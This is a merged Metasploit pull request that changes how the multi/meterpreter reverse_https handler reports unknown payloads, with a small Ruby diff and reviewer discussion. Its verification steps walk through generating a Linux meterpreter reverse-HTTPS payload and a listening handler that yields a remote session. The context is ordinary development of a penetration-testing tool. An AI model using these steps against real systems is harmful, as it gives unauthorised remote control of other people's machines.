Fix multi meterpreter_reverse_http handler to not care so much about the workspace. #11887

Merged
merged 1 commit into from May 31, 2019

@brimstone
Contributor

commented May 25, 2019

This change fixes the multi/meterpreter_reverse_https payload handler. I didn't find an existing GitHub issue.

Verification

List the steps needed to make sure this thing works

  • Create /certs/certs.pem according to Paranoid Mode:
      openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
        -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com" \
        -keyout www.example.com.key \
        -out www.example.com.crt
      cat www.example.com.key www.example.com.crt > /certs/cert.pem
  • Start msfconsole
  • setg LHOST wlan0 or your network interface name.
  • setg LPORT 443
  • setg PayloadUUIDTracking true
  • setg HandlerSSLCert /certs/cert.pem
  • setg StagerVerifySSLCert true
  • setg IgnoreUnknownPayloads true
  • setg LURI /multi
  • use payload/linux/x64/meterpreter_reverse_https
  • set PayloadUUIDName ParanoidStagedElf64
  • generate -f elf -o /tmp/rev
  • use exploit/multi/handler
  • set PAYLOAD multi/meterpreter/reverse_https
  • set ExitOnSession false
  • exploit -j
  • Run rev on the same host, or another that can reach this host over the LHOST address.
  • Verify a new session is created.
  • Verify msfconsole doesn't bark about ignoring the unknown UUID.

@wvu-r7 wvu-r7 changed the title Fix multi meterpreter_rever_http handler to not care so much about the workspace. Fix multi meterpreter_reverse_http handler to not care so much about the workspace. May 28, 2019

@@ -239,8 +239,7 @@ def setup_handler
lookup_proxy_settings

if datastore['IgnoreUnknownPayloads']
payload_count = framework.db.payloads({workspace: framework.db.workspace}).length
print_status("Handler is ignoring unknown payloads, there are #{payload_count} UUIDs whitelisted")
print_status("Handler is ignoring unknown payloads")
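
Review bot: The final print_status in this hunk drops the "#{payload_count} UUIDs whitelisted" figure, so an operator who sets IgnoreUnknownPayloads with no UUIDs registered gets no hint at startup that every incoming connection will be ignored. The count came from framework.db.payloads scoped to framework.db.workspace; if the db layer offers a lookup that is not tied to the current workspace, keep the count from that, and otherwise track the missing count as a follow-up so the message does not stay less informative than before. The +/- markers are missing from this rendering; the 8-to-7 line counts in the @@ header are consistent with the payload_count assignment and the old print_status being removed and the shorter print_status being added.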

@jmartin-r7

jmartin-r7 May 28, 2019

Contributor

The count offered had some value; it may be worth simply removing workspace scope there, as knowing that all payloads are being rejected if none are in the db would be a helpful flag to the user.

@brimstone

brimstone May 28, 2019

Author Contributor

I didn't see a way to look up all payloads in the database, so I dropped it. It seems like payloads can only be queried by id or uuid. Any tips on how to get all given the available functions?

@busterb

busterb May 30, 2019

Member

For the purpose of the bugfix, I think we might skip this for now.

@jmartin-r7 jmartin-r7 added the msf5 label May 28, 2019

@jmartin-r7 jmartin-r7 merged commit 26eebb9 into rapid7:master May 31, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

jmartin-r7 added a commit that referenced this pull request May 31, 2019
